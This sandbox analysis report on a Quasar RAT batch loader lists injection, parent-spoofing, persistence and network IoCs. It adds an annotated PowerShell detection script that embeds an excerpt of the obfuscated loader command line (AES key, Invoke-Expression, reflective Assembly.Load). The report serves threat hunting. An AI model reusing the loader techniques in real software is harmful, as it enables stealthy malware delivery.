Analysis

max time kernel: 150s
max time network: 151s
platform: windows10-ltsc 2021_x64
resource: win10ltsc2021-20241023-en
resource tags: arch:x64, arch:x86, image:win10ltsc2021-20241023-en, locale:en-us, os:windows10-ltsc 2021-x64, system
submitted: 19-11-2024 21:24
Static task: static1
Behavioral task behavioral1: sample hand.bat, resource win10v2004-20241007-en
Behavioral task behavioral2: sample hand.bat, resource win10ltsc2021-20241023-en (the run this report shows: it matches the resource above and the memory-dump path of the YARA hit)
Behavioral task behavioral3: sample hand.bat, resource win11-20241007-en
General

Target: hand.bat
Size: 7.0MB
MD5: 1a013c7ac90b58073895b26cae70def7
SHA1: 60c9c3294fc7ac3d336a478274f62f4818498230
SHA256: 698b1f0a35a76e57adef388612b29902f86f56983c772d7c6c17b4483c2be688
SHA512: c1bbb52e8546b352e041e944d7dfa158d5dc9a51b1628128d345e4a9e708871d7a1f5e59cc44a2c66f8dc9af81ec06e1b5105d5a7292497075564496f3b0ec75
SSDEEP: 49152:vZrlGoT+Xts/LJjeDPnIwT0ZFBZP2x3fLKs0HMb0DprNMiKwPjp9Kw2EdF8d7nrx:Y
Malware Config

Extracted: quasar
encryption_key: 1162A0E173FED8E7CF598896A547E279E681EE6F
reconnect_delay: 3000
Signatures

Quasar family

Quasar payload (1 IoC)
- resource: behavioral2/memory/3168-1670-0x0000016DEF200000-0x0000016DEF96C000-memory.dmp, yara_rule: family_quasar
The hit is in a memory region of the second hidden PowerShell (PID 3168), which is where the in-memory [Reflection.Assembly]::Load in the loader (see the process tree) leaves the decrypted stages; nothing is written to disk as a PE.
Suspicious use of NtCreateUserProcessOtherParentProcess (2 IoCs)
- PID 2044 powershell.exe created a process whose parent was set to PID 612 (procid_target 5)
- PID 3168 powershell.exe created a process whose parent was set to PID 612 (procid_target 5)
PID 612 is winlogon.exe, so both hidden PowerShell instances spoof their child's parent PID. The two dllhost.exe processes that appear directly under winlogon.exe in the process tree (PIDs 1364 and 3720) are those children: each is then the target of a WriteProcessMemory/SetThreadContext pair from the PowerShell that created it.
Blocklisted process makes network request (3 IoCs)
- flow 21: PID 3168 powershell.exe
- flow 24: PID 3168 powershell.exe
- flow 28: PID 3168 powershell.exe
Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
Runs PowerShell with its display window hidden (powershell.exe -WindowStyle Hidden).
- PID 2044 powershell.exe
- PID 3168 powershell.exe
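The loader command line recorded for PID 1968 in the process tree is what a hunter would key on: cmd.exe echoing a script that hides every .NET call behind '*'-salted string literals, strips the salt with .Replace('*', '') and hands the result to Invoke-Expression, with a sibling powershell.exe -WindowStyle Hidden under the same parent. The following is an added example, not part of the report: it scores process-creation command lines (Sysmon event 1 or Security 4688 CommandLine) for that pattern. It applies the loader's own de-obfuscation first (drop every '*') and then matches the plain .NET calls; two checks run on the raw text because the salting itself is the signal. The event records are constructed: PIDs 4788, 1968 and 2044 and the loader excerpt come from the report, the benign records and PIDs 5000, 5100 and 5101 are made up.

```powershell
function Get-LoaderCommandLineIndicators {
    param([Parameter(Mandatory)][string]$CommandLine)
    # Undo the loader's trick: each obfuscated call is a literal with '*' inserted
    # that the script removes with .Replace('*', '') before Invoke-Expression.
    $desalted = $CommandLine.Replace('*', '')
    $checks = [ordered]@{
        'iex-of-star-salted-literal'  = @{ Text = $CommandLine; Pattern = "Invoke-Expression\s+'[^']*'\.Replace\('\*',\s*''\)" }
        'star-interleaved-identifier' = @{ Text = $CommandLine; Pattern = '(?:[A-Za-z]\*){4,}[A-Za-z]' }
        'aes-with-hardcoded-key'      = @{ Text = $desalted;    Pattern = 'Cryptography\.Aes\]::Create\(\)[\s\S]*?\.Key\s*=\s*\[(?:System\.)?Convert\]::FromBase64String\(' }
        'gzip-decompress'             = @{ Text = $desalted;    Pattern = 'GZipStream\(.*?CompressionMode\]::Decompress' }
        'reflective-assembly-load'    = @{ Text = $desalted;    Pattern = 'Reflection\.Assembly\]::Load\(\[byte\[\]\]' }
        'entrypoint-invoke'           = @{ Text = $desalted;    Pattern = '\.EntryPoint;[\s\S]*?\.Invoke\(\$null' }
        'reads-own-bat-for-payload'   = @{ Text = $desalted;    Pattern = 'ReadAllText\([^)]*\)\.Split\(\[Environment\]::NewLine\)' }
    }
    $hits = @(foreach ($name in $checks.Keys) {
        $c = $checks[$name]
        if ([regex]::IsMatch($c.Text, $c.Pattern, 'IgnoreCase')) { $name }
    })
    [pscustomobject]@{ Score = $hits.Count; Indicators = $hits }
}

function Find-LoaderEvents {
    # Group by parent so the echoing cmd.exe and its hidden PowerShell sibling
    # (both children of cmd.exe 4788 in the report) are reported together.
    param([Parameter(Mandatory)][object[]]$Events, [int]$MinScore = 3)
    foreach ($group in ($Events | Group-Object -Property ParentProcessId)) {
        $hiddenPs = @($group.Group | Where-Object {
            $_.Image -match 'powershell\.exe$' -and $_.CommandLine -match '-WindowStyle\s+Hidden' })
        foreach ($e in $group.Group) {
            $r = Get-LoaderCommandLineIndicators -CommandLine $e.CommandLine
            if ($r.Score -ge $MinScore) {
                [pscustomobject]@{
                    ProcessId               = $e.ProcessId
                    ParentProcessId         = $e.ParentProcessId
                    Score                   = $r.Score
                    Indicators              = ($r.Indicators -join ', ')
                    HiddenPowerShellSibling = (($hiddenPs | ForEach-Object { $_.ProcessId }) -join ',')
                }
            }
        }
    }
}

# Constructed sample events. The loader command line is an excerpt of the one
# recorded for PID 1968 (full text in the process tree); the other three are made up.
$loaderCmd = @'
cmd.exe /c echo function iuYgv($leKgl){ $jPJwb=[System.Security.Cryptography.Aes]::Create(); $jPJwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $jPJwb.Key=[System.Convert]::FromBase64String('uEpqIWQRyvODISCHGUQfxzSWFesSqTmCOTn7Muaq1uk='); }function zpxNq($leKgl){ Invoke-Expression '$kWPKo=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$leKgl);'.Replace('*', ''); Invoke-Expression '$SDRXH=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($kWPKo, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); }function efQtH($leKgl,$kxxMo){ Invoke-Expression '$ECSjU=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$leKgl);'.Replace('*', ''); Invoke-Expression '$iUybu=$ECSjU.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$iUybu.*I*n*v*o*k*e*($null, $kxxMo);'.Replace('*', '');}$sWPvP=[System.IO.File]::ReadAllText($bdjtW).Split([Environment]::NewLine);
'@
$events = @(
    [pscustomobject]@{ ProcessId = 1968; ParentProcessId = 4788; Image = 'C:\Windows\System32\cmd.exe'; CommandLine = $loaderCmd }
    [pscustomobject]@{ ProcessId = 2044; ParentProcessId = 4788; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; CommandLine = 'powershell.exe -WindowStyle Hidden' }
    [pscustomobject]@{ ProcessId = 5100; ParentProcessId = 5000; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; CommandLine = 'powershell.exe -NoProfile -File C:\scripts\backup.ps1' }
    [pscustomobject]@{ ProcessId = 5101; ParentProcessId = 5000; Image = 'C:\Windows\System32\cmd.exe'; CommandLine = 'cmd.exe /c dir *.log' }
)
Find-LoaderEvents -Events $events | Format-List
```

The score threshold is deliberately low: the salted-literal and star-interleaved checks alone already separate this loader from ordinary scripts, and the .NET-call checks add confidence rather than being required. The hidden-sibling column is informational; the echoed script has no file on disk, so the command line is the only place the loader body is observable.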
Sets service image path in registry (2 TTPs, 1 IoC)
- Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" by WaaSMedicAgent.exe
The writer is WaaSMedicAgent.exe (the Windows Update Medic agent, which repairs Windows Update service configuration) and the value is the stock Delivery Optimization service path, so this is background OS activity: it is not attributable to any of the sample's own processes (1968, 2044, 3168, 1364, 3720, 1780).
Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate by wmiprvse.exe
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion by wmiprvse.exe
Both reads are by wmiprvse.exe, the WMI provider host, which answers WMI queries on behalf of other processes; the report does not show which client issued the query, so these rows cannot on their own be tied to the sample.
Executes dropped EXE (1 IoC)
- PID 1780 oauLVi.exe (the file powershell.exe created at C:\Windows\$nya-onimai2\oauLVi.exe, see "Drops file in Windows directory")
Indicator Removal: Clear Windows Event Logs (1 TTP, 1 IoC)
Clear Windows Event Logs to hide the activity of an intrusion.
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx by svchost.exe
The svchost.exe here is the EventLog service host (PID 764 in the process tree), which opens .evtx files for writing as part of normal logging; no process of the sample touches the event logs in this report, so the TTP label overstates what was observed.
Drops file in System32 directory (13 IoCs)
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 by svchost.exe
- File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan by svchost.exe
- File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work by svchost.exe
- File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work by svchost.exe
- File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask by svchost.exe
- File opened for modification C:\Windows\system32\Recovery by ReAgentc.exe
- File opened for modification C:\Windows\system32\Recovery\ReAgent.xml by ReAgentc.exe
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 by svchost.exe
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 by svchost.exe
- File opened for modification C:\Windows\System32\Tasks\$nya-mQEb5bu8 by svchost.exe
- File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work by svchost.exe
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 by svchost.exe
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml by OfficeClickToRun.exe
The Tasks\ entries are written by the Schedule service host (svchost.exe -s Schedule, PID 1272); the Microsoft\Windows\* ones are stock tasks, whereas C:\Windows\System32\Tasks\$nya-mQEb5bu8 is a task definition created during this run and is the persistence artifact to look for. The CryptnetUrlCache entries belong to CryptSvc (PID 2764), and the ReAgentc.exe and OfficeClickToRun.exe rows are not from the sample's process chain.
Suspicious use of SetThreadContext (2 IoCs)
- PID 2044 powershell.exe set thread context of PID 1364 (procid_target 91)
- PID 3168 powershell.exe set thread context of PID 3720 (procid_target 100)
Together with the WriteProcessMemory rows for the same pairs (2044 to 1364, eight writes), this is the hand-off of code from each hidden PowerShell into the dllhost.exe it spawned under a spoofed winlogon.exe parent.
Drops file in Windows directory (8 IoCs)
- File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml by ReAgentc.exe
- File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml by ReAgentc.exe
- File opened for modification C:\Windows\$rbx-onimai2 by powershell.exe
- File created C:\Windows\$rbx-onimai2\$rbx-CO2.bat by cmd.exe
- File opened for modification C:\Windows\$nya-onimai2 by powershell.exe
- File created C:\Windows\$nya-onimai2\oauLVi.exe by powershell.exe
- File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log by ReAgentc.exe
- File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log by ReAgentc.exe
The two $-prefixed directories under C:\Windows and their contents are the sample's: $rbx-CO2.bat is a copy of hand.bat made with "type ... >" (see PID 3208 in the process tree) and oauLVi.exe is the dropped executable that later runs as PID 1780. ReAgentc.exe is the Windows Recovery Environment configuration tool; its invocation is not visible in the truncated process tree.
Checks processor information in registry (2 TTPs, 15 IoCs)
Processor information is often read in order to detect sandboxing environments.
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz by svchost.exe
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 by mousocoreworker.exe
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 by mousocoreworker.exe
- Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 by wmiprvse.exe
- Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 by svchost.exe
- Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 by mousocoreworker.exe
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 by wmiprvse.exe
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier by wmiprvse.exe
- Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 by mousocoreworker.exe
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString by mousocoreworker.exe
- Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 by wmiprvse.exe
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString by wmiprvse.exe
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz by mousocoreworker.exe
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier by mousocoreworker.exe
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information by wmiprvse.exe
As with the BIOS rows, every reader here is a system component (svchost.exe, mousocoreworker.exe, wmiprvse.exe), none of them in the sample's process chain; only the wmiprvse.exe reads could be serving a query from the sample, and the table does not show the WMI client.
Enumerates system info in registry (2 TTPs, 3 IoCs)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU by mousocoreworker.exe
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier by wmiprvse.exe
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS by mousocoreworker.exe
Modifies data under HKEY_USERS (64 IoCs)
All 64 rows are by svchost.exe (certificate store keys under S-1-5-20, the NetworkService account, and IdentityCRL under .DEFAULT), mousocoreworker.exe and OfficeClickToRun.exe; none are by the sample's processes.
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "00188010E58640AD" by svchost.exe
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows by mousocoreworker.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs by svchost.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs by svchost.exe
- Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections by svchost.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates by svchost.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates by svchost.exe
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor by OfficeClickToRun.exe
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft by mousocoreworker.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates by svchost.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs by svchost.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates by svchost.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs by svchost.exe
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry by OfficeClickToRun.exe
- Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed by svchost.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs by svchost.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs by svchost.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs by svchost.exe
- Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust by svchost.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs by svchost.exe
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common by OfficeClickToRun.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs by svchost.exe
- Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust by svchost.exe
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1732051581" by OfficeClickToRun.exe
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} by mousocoreworker.exe
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion by mousocoreworker.exe
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek by mousocoreworker.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs by svchost.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs by svchost.exe
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property by mousocoreworker.exe
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager by mousocoreworker.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates by svchost.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs by svchost.exe
- Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe by OfficeClickToRun.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs by svchost.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs by svchost.exe
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "00188010E58640AD" by mousocoreworker.exe
- Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA by svchost.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs by svchost.exe
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 by OfficeClickToRun.exe
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" by OfficeClickToRun.exe
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe by OfficeClickToRun.exe
- Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR by OfficeClickToRun.exe
- Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\00188010E58640AD = (binary value not reproduced in the source) by mousocoreworker.exe
- Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA by svchost.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs by svchost.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs by svchost.exe
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={8F4CBB41-74B8-4011-B44C-F76D702C5A96}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" by OfficeClickToRun.exe
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" by mousocoreworker.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates by svchost.exe
- Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed by svchost.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates by svchost.exe
- Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot by svchost.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates by svchost.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs by svchost.exe
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" by OfficeClickToRun.exe
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore by mousocoreworker.exe
- Key created \REGISTRY\USER\.DEFAULT\Software by mousocoreworker.exe
- Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root by svchost.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates by svchost.exe
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 19 Nov 2024 21:26:22 GMT" by OfficeClickToRun.exe
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs by svchost.exe
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata by OfficeClickToRun.exe
- Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000f5700b71113c2b45abca0dda15e6fa42000000000200000000001066000000010000200000007e2e52e75ae256bd8d7989d4a37fcbc1c0ff99817f579e4196d35b60e5c295f7000000000e8000000002000020000000288cd6e739d11dc0db3a4740859d53d106af4eb0f16b22e762820eecd52e4706b0030000ab0960cd1e92efdc136c43d7aaa88875281e289504c68f1f39c7e17d06eddbb546ac6bb4ac56025a7aa648b84b50fbbe5851d8e3bc92d0517b62f6ece824c4dbc3dc2091b6790881a6782cb0e810ba2c4631f8d6b10dddb2507dd3dc1e0b01712c213dca5498477ea639be43eaa5c96dacbb94057759cb0e98341b060829b5c4ca775e5c927f8f10f887d6554e84a46b6ecda8fb5d1b3cef1a1eb5211d117daea906f9baa81961f3b6737f30583fdbdb1b6549b0bb4c8f8e296aff5e6bb52ec163f64f4fb6d20bea9bbe8527265b41ac2ebe28cad01cc16a331d5ada1ee898ad6fee3a1457d15acb7a835d2dc57ffcf20174308280fdbda1119309bf67dfe4dd3af387afe03dde8c7e44614ab7212069db3cd344f845d0b25a7c951834c03900dd2ee8ede02ccc96fb99a30dee746c05b2a0a4a61e7e7306568083e00f41ca99ec8710b5c651bddf472b8e9f30c46e92903421c219eb8f62ae086f86e48ff035c47b77ce0941e44da58f60a6933a3fbccace5be1942e395ce0184b65e938d0936b1430a35e56081956e352aa03ef19a635b5747b960a1d81985f94f28ee5d3bb9c63b2cd0528a994c4dd967427f7c7161e3b9e16b4c79eb08ceb2558340e4ad0c049215fb7981d987382eda8a505b6f45fd257d61ad1c3b6cba57bbad344642939b8ed95f808e05e13682fd4375bee4694ed53ff99907aac79985ff5a8a138ab186ba12ce1b6c110bca1ff33d4f06ae7664efc271026c7b75a1f8742883fad45829976199ae9911b18642f0952c23bb1cfba113b08383232b0f873efda31aa04a09e21cff3742b9147822de39e3c2975801a21e01980feeb450076fca4efae71eb002e35f9d0a8e93a1b42c588efdcb879a6c0ca9934ef983d2ece8d05c017166bea92fbb4c73e122e0cb9df900c53f2abcda07b16d6dd17d5d5ea1d91fa4966fdd8d991a897003146f9651369b19b7b0d5897d74fae61c72c377ea8f77b701da7570638fdd691155612e7fc12a692db0c5b56a89876b2b7946fff77d3e702fa96043fe02b89809ee13d8174b42dbcc656aa63aba66fdde62989c2c4c179e6ac0e8cfc9a318430baf81ea7c3529441be42444cea08b70e1489f33257a19a12c98716a1789c6978d9b4da125f6ccf0d27aca43ae89ab477e5a4cd6e3e01e330a68200e381f966e95a0bcde666cf587b505dbc0c7f7f67a7c3e6ed315f7cf7e22ec5f20ebbe55b45e0b63bdddaca3f0797124029e459c6118b8a06d63d6bda492db1deaee280080708e836f4300c83a0640e1e352defea3c79e5559e11348bfbc3262b41d7cda7a90a3941f3891fa3bd4340000000ce24c3c39d4f90051df34ba77fdb2f1e7462b3d6d569d9ff0ce9281eac43dadda6ae972f977c6fc7c653bb18f26309292673305ef9eeac191b98dc45698254b7 by mousocoreworker.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Tallied from the 64 rows: powershell.exe PID 2044 x3, powershell.exe PID 3168 x6, dllhost.exe PID 1364 x55. The bulk of the enumeration is by the injected dllhost.exe, which matches its WriteProcessMemory activity against nearly every process on the system.
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Grouped by process (tallied from the 64 rows):
- SeDebugPrivilege: 2044 powershell.exe, 1364 dllhost.exe, 3168 powershell.exe, 3720 dllhost.exe (one row each). These are the sample's loader and injected processes; SeDebugPrivilege is what lets them open processes running under other accounts for the WriteProcessMemory/SetThreadContext calls below.
- SeShutdownPrivilege and SeCreatePagefilePrivilege pairs: 1076 dwm.exe (1 pair), 3652 Explorer.EXE (7 pairs), 2024 svchost.exe (1 pair)
- SeShutdownPrivilege: 780 RuntimeBroker.exe (3 rows)
- SeAuditPrivilege: 2364 svchost.exe (1 row)
- 1744 svchost.exe (Winmgmt): the sequence SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeUndockPrivilege, SeManageVolumePrivilege repeated three times, then SeAssignPrimaryTokenPrivilege and SeIncreaseQuotaPrivilege once more (38 rows)
Suspicious use of FindShellTrayWindow (4 IoCs)
- PID 3652 Explorer.EXE (4 rows)
Suspicious use of SetWindowsHookEx (1 IoC)
- PID 3168 powershell.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Grouped by writer, in the order the rows appear (procid_target in parentheses):
- 4788 cmd.exe wrote to 1968 (84) x2 and to 2044 (85) x2: the batch launcher starting the echo and the hidden PowerShell
- 2044 powershell.exe wrote to 1364 dllhost.exe (91) x8: the injection into the spoofed-parent dllhost.exe
